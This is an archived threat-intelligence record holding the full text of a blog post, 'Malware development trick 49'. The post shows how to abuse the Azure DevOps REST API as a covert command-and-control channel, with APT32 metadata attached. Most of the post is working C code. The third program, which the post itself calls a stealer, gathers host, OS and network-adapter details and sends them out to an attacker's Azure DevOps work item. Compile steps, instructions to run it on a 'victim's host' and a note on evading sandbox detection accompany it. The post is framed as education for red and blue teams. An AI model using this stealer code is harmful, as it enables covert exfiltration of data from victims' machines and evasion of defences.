{ "id": "1ebd9043-b3f7-4c8b-88a7-6a008ef4e2f1", "created_at": "2026-04-06T00:14:03.427892Z", "updated_at": "2026-04-10T03:36:22.044582Z", "deleted_at": null, "sha1_hash": "1156234dad87e29276371637d96c15a8c3d1b961", "title": "Malware development trick 49: abusing Azure DevOps REST API for covert data channels. Simple C examples.", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2909740, "plain_text": "Malware development trick 49: abusing Azure DevOps REST API\r\nfor covert data channels. Simple C examples.\r\nBy cocomelonc\r\nPublished: 2025-08-11 · Archived: 2026-04-05 22:25:23 UTC\r\n7 minute read\r\n﷽\r\nHello, cybersecurity enthusiasts and white hackers!\r\nIn this post, I want to show how Azure DevOps REST API - a totally legit Microsoft service - can be used by an\r\nattacker to communicate with their infrastructure in unexpected ways. This is not an Azure DevOps bug, but an\r\nabuse of functionality.\r\nThink of it as using a perfectly fine hammer… to crack a safe.\r\nWe will explore three minimal proof-of-concepts:\r\nsending a simple GET request to list Azure DevOps projects.\r\ncreating a work item (Task) with a title.\r\ncreating a work item with a title and a description containing arbitrary text - a “safe” stand-in for sensitive data in\r\na stealer scenario.\r\nhttps://cocomelonc.github.io/malware/2025/08/11/malware-tricks-49.html\r\nPage 1 of 22\n\nazure servicesPermalink\r\nIf you are not familiar with Azure Devops Services like me, let me show few steps to create minimal env for our\r\nhacking scenario.\r\nWe just need the smallest possible environment so our PoC has somewhere to talk to.\r\nGo to https://dev.azure.com/ and sign in with a Microsoft account. If prompted, create a new organization - name\r\nit anything (in my case, cocomelonkz ):\r\nhttps://cocomelonc.github.io/malware/2025/08/11/malware-tricks-49.html\r\nPage 2 of 22\n\nThen, create a project. In your new organization, click “New Project”. Give it a short name, e.g., hack or cat .\r\nVisibility can be private (this is fine for our test):\r\nhttps://cocomelonc.github.io/malware/2025/08/11/malware-tricks-49.html\r\nPage 3 of 22\n\nFinally, generate a Personal Access Token (PAT):\r\nhttps://cocomelonc.github.io/malware/2025/08/11/malware-tricks-49.html\r\nPage 4 of 22\n\nhttps://cocomelonc.github.io/malware/2025/08/11/malware-tricks-49.html\r\nPage 5 of 22\n\nIn my case full access, but you need read and write permissions - it’s enough for our scenario.\r\nFor checking correctness, test API via curl :\r\ncurl -u \":your token here something like 9O1QFlG1YxLe88F65PfHutr...........CAAAAAAAAAAAAASAZDOOcAA\" -X GET \"htt\r\nAs you can see, you should see JSON with your project list. If you get that, your Azure DevOps “C2 server” is\r\nready for abuse.\r\npractical example 1Permalink\r\nThe simplest way to talk to Azure DevOps REST API is to hit an endpoint, for example:\r\n/cocomelonkz/_apis/projects?api-version=7.1\r\nIn this case, full source code looks like this hack.c :\r\n/*\r\n * hack.c\r\n * minimal simple GET request to\r\n * Azure DevOps REST API:\r\n * list of projects\r\nhttps://cocomelonc.github.io/malware/2025/08/11/malware-tricks-49.html\r\nPage 6 of 22\n\n* helper function for stealer\r\n * author @cocomelonc\r\n */\r\n#include \u003cstdio.h\u003e\r\n#include \u003cwindows.h\u003e\r\n#include \u003cwinhttp.h\u003e\r\n \r\nint main() {\r\n HINTERNET hSession, hConnect, hRequest;\r\n DWORD bytesRead;\r\n char buffer[4096];\r\n \r\n // init\r\n hSession = WinHttpOpen(L\"UserAgent\", WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,\r\n WINHTTP_NO_PROXY_NAME, WINHTTP_NO_PROXY_BYPASS, 0);\r\n if (!hSession) {\r\n printf(\"WinHttpOpen failed: %lu\\n\", GetLastError());\r\n return 1;\r\n }\r\n \r\n // connect to dev.azure.com (HTTPS)\r\n hConnect = WinHttpConnect(hSession, L\"dev.azure.com\", INTERNET_DEFAULT_HTTPS_PORT, 0);\r\n if (!hConnect) {\r\n printf(\"WinHttpConnect failed: %lu\\n\", GetLastError());\r\n WinHttpCloseHandle(hSession);\r\n return 1;\r\n }\r\n \r\n // GET-req\r\n hRequest = WinHttpOpenRequest(\r\n hConnect,\r\n L\"GET\",\r\n L\"/cocomelonkz/_apis/projects?api-version=7.1\",\r\n NULL, WINHTTP_NO_REFERER,\r\n WINHTTP_DEFAULT_ACCEPT_TYPES,\r\n WINHTTP_FLAG_SECURE\r\n );\r\n \r\n // headers\r\n const wchar_t *headers =\r\n L\"Accept: application/json\\r\\n\"\r\n L\"Authorization: Basic \u003cmy base64 encoded token here\u003e\"\r\n L\"\\r\\n\";\r\n \r\n WinHttpAddRequestHeaders(hRequest, headers, (ULONG)-1, WINHTTP_ADDREQ_FLAG_ADD);\r\n \r\n // send request\r\nhttps://cocomelonc.github.io/malware/2025/08/11/malware-tricks-49.html\r\nPage 7 of 22\n\nif (!WinHttpSendRequest(hRequest, WINHTTP_NO_ADDITIONAL_HEADERS, 0,\r\n WINHTTP_NO_REQUEST_DATA, 0, 0, 0)) {\r\n printf(\"WinHttpSendRequest failed: %lu\\n\", GetLastError());\r\n return 1;\r\n }\r\n \r\n if (!WinHttpReceiveResponse(hRequest, NULL)) {\r\n printf(\"WinHttpReceiveResponse failed: %lu\\n\", GetLastError());\r\n return 1;\r\n }\r\n \r\n // get response\r\n while (WinHttpReadData(hRequest, buffer, sizeof(buffer) - 1, \u0026bytesRead) \u0026\u0026 bytesRead \u003e 0) {\r\n buffer[bytesRead] = '\\0';\r\n printf(\"%s\", buffer);\r\n }\r\n \r\n WinHttpCloseHandle(hRequest);\r\n WinHttpCloseHandle(hConnect);\r\n WinHttpCloseHandle(hSession);\r\n return 0;\r\n}\r\nAs you can see, this is a program with minimal helper logic: this is enough to pull metadata from Azure DevOps\r\nwithout triggering anything suspicious in most network setups.\r\nJust replace with your own token:\r\necho -n \":9O1QFlG1...QQJ99BHACAAAAAAAAAAAAASAZDOOcAA\" | base64\r\ndemo 1Permalink\r\nLet’s go to see first example in action. Compile it:\r\nx86_64-w64-mingw32-g++ hack.c -o hack.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-section\r\nhttps://cocomelonc.github.io/malware/2025/08/11/malware-tricks-49.html\r\nPage 8 of 22\n\nThen, run in the victim’s machine (in my case Windows 10/11 VM):\r\n.\\hack.exe\r\nAs you can see, everything is worked as expected!\r\nhttps://cocomelonc.github.io/malware/2025/08/11/malware-tricks-49.html\r\nPage 9 of 22\n\npractical example 2Permalink\r\nLet’s update our logic: creating a work item with a title. Since an attacker want push data from victim’s host\r\ninstead of pulling. Azure DevOps supports creating work items via REST API.\r\nWe can send a JSON PATCH request to:\r\nPOST /ORG/PROJECT/_apis/wit/workitems/$Task?api-version=7.1\r\nContent-Type: application/json-patch+json\r\nHere’s a minimal PoC that sets only the System.Title , based on Microsoft documentation ( hack2.c ):\r\n/*\r\n * hack2.c\r\n * Azure DevOps REST API\r\n * create work item\r\n * helper function for stealer\r\n * author @cocomelonc\r\n */\r\n#include \u003cstdio.h\u003e\r\n#include \u003cwindows.h\u003e\r\n#include \u003cwinhttp.h\u003e\r\nint main() {\r\n HINTERNET hSession, hConnect, hRequest;\r\n DWORD bytesRead;\r\n char buffer[8192];\r\n // headers\r\n const wchar_t *authHeader = L\"Authorization: Basic Ojl...FBQUFBQVNBWkRPT2NBQQ==\\r\\n\";\r\n const wchar_t *contentHeader = L\"Content-Type: application/json-patch+json\\r\\n\";\r\n const wchar_t *acceptHeader = L\"Accept: application/json\\r\\n\";\r\n // JSON patch for patch operations (PATCH)\r\n const char *postData = \"[{\\\"op\\\":\\\"add\\\",\\\"path\\\":\\\"/fields/System.Title\\\",\\\"from\\\":null,\\\"value\\\":\\\"meow\\\"}]\"\r\n hSession = WinHttpOpen(L\"UserAgent\", WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,\r\n WINHTTP_NO_PROXY_NAME, WINHTTP_NO_PROXY_BYPASS, 0);\r\n hConnect = WinHttpConnect(hSession, L\"dev.azure.com\", INTERNET_DEFAULT_HTTPS_PORT, 0);\r\n hRequest = WinHttpOpenRequest(\r\n hConnect,\r\n L\"POST\",\r\n L\"/cocomelonkz/hack1/_apis/wit/workitems/$Task?api-version=7.1\",\r\n NULL, WINHTTP_NO_REFERER,\r\nhttps://cocomelonc.github.io/malware/2025/08/11/malware-tricks-49.html\r\nPage 10 of 22\n\nWINHTTP_DEFAULT_ACCEPT_TYPES,\r\n WINHTTP_FLAG_SECURE\r\n );\r\n WinHttpAddRequestHeaders(hRequest, authHeader, -1L, WINHTTP_ADDREQ_FLAG_ADD);\r\n WinHttpAddRequestHeaders(hRequest, contentHeader, -1L, WINHTTP_ADDREQ_FLAG_ADD);\r\n WinHttpAddRequestHeaders(hRequest, acceptHeader, -1L, WINHTTP_ADDREQ_FLAG_ADD);\r\n WinHttpSendRequest(hRequest,\r\n WINHTTP_NO_ADDITIONAL_HEADERS, 0,\r\n (LPVOID)postData, strlen(postData),\r\n strlen(postData), 0);\r\n WinHttpReceiveResponse(hRequest, NULL);\r\n while (WinHttpReadData(hRequest, buffer, sizeof(buffer) - 1, \u0026bytesRead) \u0026\u0026 bytesRead \u003e 0) {\r\n buffer[bytesRead] = '\\0';\r\n printf(\"%s\", buffer);\r\n }\r\n WinHttpCloseHandle(hRequest);\r\n WinHttpCloseHandle(hConnect);\r\n WinHttpCloseHandle(hSession);\r\n return 0;\r\n}\r\nDon’t forget to replace with your own base64 -encoded token.\r\ndemo 2Permalink\r\nCompile second example:\r\nx86_64-w64-mingw32-g++ hack2.c -o hack2.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-secti\r\nhttps://cocomelonc.github.io/malware/2025/08/11/malware-tricks-49.html\r\nPage 11 of 22\n\nThen, run on the victim’s host:\r\n.\\hack2.exe\r\nhttps://cocomelonc.github.io/malware/2025/08/11/malware-tricks-49.html\r\nPage 12 of 22\n\nNow our PoC creates an artifact in the cloud:\r\nhttps://cocomelonc.github.io/malware/2025/08/11/malware-tricks-49.html\r\nPage 13 of 22\n\npractical example 3: stealerPermalink\r\nHere we’ll simulate a scenario where system information is sent to Azure DevOps like before: Github API,\r\nVirusTotal or Telegram.\r\nThe full source code is looks like this hack3.c :\r\n/*\r\n * hack3.c\r\n * Azure DevOps REST API stealer\r\n * author @cocomelonc\r\n */\r\n#include \u003cwindows.h\u003e\r\n#include \u003cwinhttp.h\u003e\r\n#include \u003cwincrypt.h\u003e\r\n#include \u003ciphlpapi.h\u003e\r\n#include \u003cstdio.h\u003e\r\n#pragma comment(lib, \"winhttp.lib\")\r\n#pragma comment(lib, \"iphlpapi.lib\")\r\n#pragma comment(lib, \"crypt32.lib\")\r\nint sendToAzure(const char* project, const char* pat, const char* title, const char* description) {\r\n HINTERNET hSession, hConnect, hRequest;\r\n char authHeader[512];\r\n char jsonBody[10000];\r\n DWORD bytesRead;\r\n char buffer[8192];\r\n // construct json body\r\n snprintf(jsonBody, sizeof(jsonBody),\r\n \"[{\\\"op\\\":\\\"add\\\",\\\"path\\\":\\\"/fields/System.Title\\\",\\\"value\\\":\\\"%s\\\"},\"\r\n \"{\\\"op\\\":\\\"add\\\",\\\"path\\\":\\\"/fields/System.Description\\\",\\\"value\\\":\\\"%s\\\"}]\",\r\nhttps://cocomelonc.github.io/malware/2025/08/11/malware-tricks-49.html\r\nPage 14 of 22\n\ntitle, description);\r\n // encode PAT to base64 (PAT without username\r\n // for Azure DevOps \":PAT\")\r\n char patAuth[256];\r\n snprintf(patAuth, sizeof(patAuth), \":%s\", pat);\r\n DWORD patLen = lstrlenA(patAuth);\r\n DWORD base64Len = 0;\r\n if (!CryptBinaryToStringA((BYTE*)patAuth, patLen, CRYPT_STRING_BASE64 | CRYPT_STRING_NOCRLF, NULL, \u0026base64Len)\r\n fprintf(stderr, \"Base64 length error\\n\");\r\n return 1;\r\n }\r\n char patBase64[256];\r\n if (!CryptBinaryToStringA((BYTE*)patAuth, patLen, CRYPT_STRING_BASE64 | CRYPT_STRING_NOCRLF, patBase64, \u0026base6\r\n fprintf(stderr, \"Base64 encode error\\n\");\r\n return 1;\r\n }\r\n snprintf(authHeader, sizeof(authHeader), \"Authorization: Basic %s\", patBase64);\r\n // printf(\"%s\\n\", authHeader);\r\n hSession = WinHttpOpen(L\"Agent\", WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, WINHTTP_NO_PROXY_NAME, WINHTTP_NO_PROXY_BY\r\n hConnect = WinHttpConnect(hSession, L\"dev.azure.com\", INTERNET_DEFAULT_HTTPS_PORT, 0);\r\n char path[512];\r\n snprintf(path, sizeof(path), \"/cocomelonkz/%s/_apis/wit/workitems/$Task?api-version=7.1\", project);\r\n wchar_t wpath[512];\r\n MultiByteToWideChar(CP_ACP, 0, path, -1, wpath, 512);\r\n hRequest = WinHttpOpenRequest(hConnect, L\"POST\", wpath, NULL, WINHTTP_NO_REFERER, WINHTTP_DEFAULT_ACCEPT_TYPES\r\n wchar_t wauthHeader[512];\r\n wchar_t wctypeHeader[] = L\"Content-Type: application/json-patch+json\";\r\n MultiByteToWideChar(CP_ACP, 0, authHeader, -1, wauthHeader, 512);\r\n WinHttpAddRequestHeaders(hRequest, wauthHeader, -1, WINHTTP_ADDREQ_FLAG_ADD);\r\n WinHttpAddRequestHeaders(hRequest, wctypeHeader, -1, WINHTTP_ADDREQ_FLAG_ADD);\r\n WinHttpSendRequest(hRequest, WINHTTP_NO_ADDITIONAL_HEADERS, 0, (LPVOID)jsonBody, strlen(jsonBody), strlen(json\r\n WinHttpReceiveResponse(hRequest, NULL);\r\n // get response (checking)\r\n WinHttpReceiveResponse(hRequest, NULL);\r\nhttps://cocomelonc.github.io/malware/2025/08/11/malware-tricks-49.html\r\nPage 15 of 22\n\nwhile (WinHttpReadData(hRequest, buffer, sizeof(buffer) - 1, \u0026bytesRead) \u0026\u0026 bytesRead \u003e 0) {\r\n buffer[bytesRead] = '\\0';\r\n printf(\"%s\", buffer);\r\n }\r\n WinHttpCloseHandle(hRequest);\r\n WinHttpCloseHandle(hConnect);\r\n WinHttpCloseHandle(hSession);\r\n return 0;\r\n}\r\nint main() {\r\n char systemInfo[4096];\r\n CHAR hostName[MAX_COMPUTERNAME_LENGTH + 1];\r\n DWORD size = sizeof(hostName) / sizeof(hostName[0]);\r\n GetComputerNameA(hostName, \u0026size);\r\n OSVERSIONINFO osVersion;\r\n osVersion.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);\r\n GetVersionEx(\u0026osVersion);\r\n SYSTEM_INFO sysInfo;\r\n GetSystemInfo(\u0026sysInfo);\r\n DWORD drives = GetLogicalDrives();\r\n IP_ADAPTER_INFO adapterInfo[16];\r\n DWORD adapterInfoSize = sizeof(adapterInfo);\r\n GetAdaptersInfo(adapterInfo, \u0026adapterInfoSize);\r\n snprintf(systemInfo, sizeof(systemInfo),\r\n \"Host Name: %s\\n\"\r\n \"OS Version: %d.%d.%d\\n\"\r\n \"Processor Architecture: %d\\n\"\r\n \"Number of Processors: %d\\n\"\r\n \"Logical Drives: %X\\n\",\r\n hostName,\r\n osVersion.dwMajorVersion, osVersion.dwMinorVersion, osVersion.dwBuildNumber,\r\n sysInfo.wProcessorArchitecture,\r\n sysInfo.dwNumberOfProcessors,\r\n drives);\r\n for (PIP_ADAPTER_INFO adapter = adapterInfo; adapter != NULL; adapter = adapter-\u003eNext) {\r\n snprintf(systemInfo + strlen(systemInfo), sizeof(systemInfo) - strlen(systemInfo),\r\n \"Adapter Name: %s\\n\"\r\n \"IP Address: %s\\n\"\r\nhttps://cocomelonc.github.io/malware/2025/08/11/malware-tricks-49.html\r\nPage 16 of 22\n\n\"Subnet Mask: %s\\n\"\r\n \"MAC Address: %02X-%02X-%02X-%02X-%02X-%02X\\n\\n\",\r\n adapter-\u003eAdapterName,\r\n adapter-\u003eIpAddressList.IpAddress.String,\r\n adapter-\u003eIpAddressList.IpMask.String,\r\n adapter-\u003eAddress[0], adapter-\u003eAddress[1], adapter-\u003eAddress[2],\r\n adapter-\u003eAddress[3], adapter-\u003eAddress[4], adapter-\u003eAddress[5]);\r\n }\r\n sendToAzure(\"hack1\", \"9...CAAAAAAAAAAAAASAZDOOcAA\", \"meow2\", systemInfo);\r\n return 0;\r\n}\r\nAs you can see, this source code is pretty similar my Github, Telegram and VirusTotal scenarios.\r\ndemo 3Permalink\r\nCompile stealer example:\r\nx86_64-w64-mingw32-g++ hack3.c -o hack3.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-secti\r\nThen, run on the victim’s host:\r\n.\\hack3.exe\r\nhttps://cocomelonc.github.io/malware/2025/08/11/malware-tricks-49.html\r\nPage 17 of 22\n\nhttps://cocomelonc.github.io/malware/2025/08/11/malware-tricks-49.html\r\nPage 18 of 22\n\nAs you can see, everything is works perfectly! =^..^=\r\nThis approach has some interesting traits:\r\nblends with legit traffic - all calls go to dev.azure.com .\r\nno additional infra needed - the “C2” is a Microsoft service.\r\npersistence and history - once data is in a work item, it stays there until deleted.\r\ntwo-way channel - you can GET and POST to exchange data.\r\nFor Blue teams, the lesson is as always: not all “benign” cloud traffic is harmless.\r\nUpload to ANY.RUN:\r\nhttps://cocomelonc.github.io/malware/2025/08/11/malware-tricks-49.html\r\nPage 19 of 22\n\nhttps://cocomelonc.github.io/malware/2025/08/11/malware-tricks-49.html\r\nPage 20 of 22\n\nAs you can see, ANY.RUN says that everything is ok: no threats detected.\r\nSummary: interaction with the Azure cloud is recognized as legitimate behavior and this is the main\r\nhttps://cocomelonc.github.io/malware/2025/08/11/malware-tricks-49.html\r\nPage 21 of 22\n\nproblem! Pwn! =^..^=\r\nhttps://app.any.run/tasks/5ad3bf05-f2c3-48d0-8552-7a988b536ad8\r\nMalware like AllaKore and APTs like APT32: OceanLotus use Azure for malicious actions in the wild\r\nI hope this post is useful for malware researchers, C/C++ programmers, spreads awareness to the blue teamers of\r\nthis interesting technique, and adds a weapon to the red teamers arsenal.\r\nThanks to ANY.RUN for API!\r\nANY.RUN\r\nANY.RUN: hack3.exe\r\nMicrosoft: Get started with Azure DevOps REST API\r\nAllaKore\r\nAllaKore variant leverages Azure cloud C2\r\nGithub API stealer\r\nVirusTotal API stealer\r\nTelegram Bot API stealer\r\nsource code in Github\r\nThis is a practical case for educational purposes only.\r\nThanks for your time happy hacking and good bye!\r\nPS. All drawings and screenshots are mine\r\nSource: https://cocomelonc.github.io/malware/2025/08/11/malware-tricks-49.html\r\nhttps://cocomelonc.github.io/malware/2025/08/11/malware-tricks-49.html\r\nPage 22 of 22\n\n https://cocomelonc.github.io/malware/2025/08/11/malware-tricks-49.html \nThen, run in the victim’s machine (in my case Windows 10/11 VM):\n.\\hack.exe \nAs you can see, everything is worked as expected! \n Page 9 of 22", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://cocomelonc.github.io/malware/2025/08/11/malware-tricks-49.html" ], "report_names": [ "malware-tricks-49.html" ], "threat_actors": [ { "id": "af509bbb-8d18-4903-a9bd-9e94099c6b30", "created_at": "2023-01-06T13:46:38.585525Z", "updated_at": "2026-04-10T02:00:03.030833Z", "deleted_at": null, "main_name": "APT32", "aliases": [ "OceanLotus", "ATK17", "G0050", "APT-C-00", "APT-32", "Canvas Cyclone", "SeaLotus", "Ocean Buffalo", "OceanLotus Group", "Cobalt Kitty", "Sea Lotus", "APT 32", "POND LOACH", "TIN WOODLAWN", "Ocean Lotus" ], "source_name": "MISPGALAXY:APT32", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "aa73cd6a-868c-4ae4-a5b2-7cb2c5ad1e9d", "created_at": "2022-10-25T16:07:24.139848Z", "updated_at": "2026-04-10T02:00:04.878798Z", "deleted_at": null, "main_name": "Safe", "aliases": [], "source_name": "ETDA:Safe", "tools": [ "DebugView", "LZ77", "OpenDoc", "SafeDisk", "TypeConfig", "UPXShell", "UsbDoc", "UsbExe" ], "source_id": "ETDA", "reports": null }, { "id": "870f6f62-84f5-48ca-a18e-cf2902cd6924", "created_at": "2022-10-25T15:50:23.303818Z", "updated_at": "2026-04-10T02:00:05.301184Z", "deleted_at": null, "main_name": "APT32", "aliases": [ "APT32", "SeaLotus", "OceanLotus", "APT-C-00", "Canvas Cyclone" ], "source_name": "MITRE:APT32", "tools": [ "Mimikatz", "ipconfig", "Kerrdown", "Cobalt Strike", "SOUNDBITE", "OSX_OCEANLOTUS.D", "KOMPROGO", "netsh", "RotaJakiro", "PHOREAL", "Arp", "Denis", "Goopy" ], "source_id": "MITRE", "reports": null }, { "id": "5da6b5fd-1955-412a-81aa-069fb50b6e31", "created_at": "2025-08-07T02:03:25.116085Z", "updated_at": "2026-04-10T02:00:03.668978Z", "deleted_at": null, "main_name": "TIN WOODLAWN", "aliases": [ "APT32 ", "Cobalt Kitty", "OceanLotus", "WOODLAWN " ], "source_name": "Secureworks:TIN WOODLAWN", "tools": [ "Cobalt Strike", "Denis", "Goopy", "JEShell", "KerrDown", "Mimikatz", "Ratsnif", "Remy", "Rizzo", "RolandRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "2439ad53-39cc-4fff-8fdf-4028d65803c0", "created_at": "2022-10-25T16:07:23.353204Z", "updated_at": "2026-04-10T02:00:04.55407Z", "deleted_at": null, "main_name": "APT 32", "aliases": [ "APT 32", "APT-C-00", "APT-LY-100", "ATK 17", "G0050", "Lotus Bane", "Ocean Buffalo", "OceanLotus", "Operation Cobalt Kitty", "Operation PhantomLance", "Pond Loach", "SeaLotus", "SectorF01", "Tin Woodlawn" ], "source_name": "ETDA:APT 32", "tools": [ "Agentemis", "Android.Backdoor.736.origin", "AtNow", "Backdoor.MacOS.OCEANLOTUS.F", "BadCake", "CACTUSTORCH", "CamCapture Plugin", "CinaRAT", "Cobalt Strike", "CobaltStrike", "Cuegoe", "DKMC", "Denis", "Goopy", "HiddenLotus", "KOMPROGO", "KerrDown", "METALJACK", "MSFvenom", "Mimikatz", "Nishang", "OSX_OCEANLOTUS.D", "OceanLotus", "PHOREAL", "PWNDROID1", "PhantomLance", "PowerSploit", "Quasar RAT", "QuasarRAT", "RatSnif", "Remy", "Remy RAT", "Rizzo", "Roland", "Roland RAT", "SOUNDBITE", "Salgorea", "Splinter RAT", "Terracotta VPN", "Yggdrasil", "cobeacon", "denesRAT", "fingerprintjs2" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434443, "ts_updated_at": 1775792182, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/1156234dad87e29276371637d96c15a8c3d1b961.pdf", "text": "https://archive.orkl.eu/1156234dad87e29276371637d96c15a8c3d1b961.txt", "img": "https://archive.orkl.eu/1156234dad87e29276371637d96c15a8c3d1b961.jpg" } }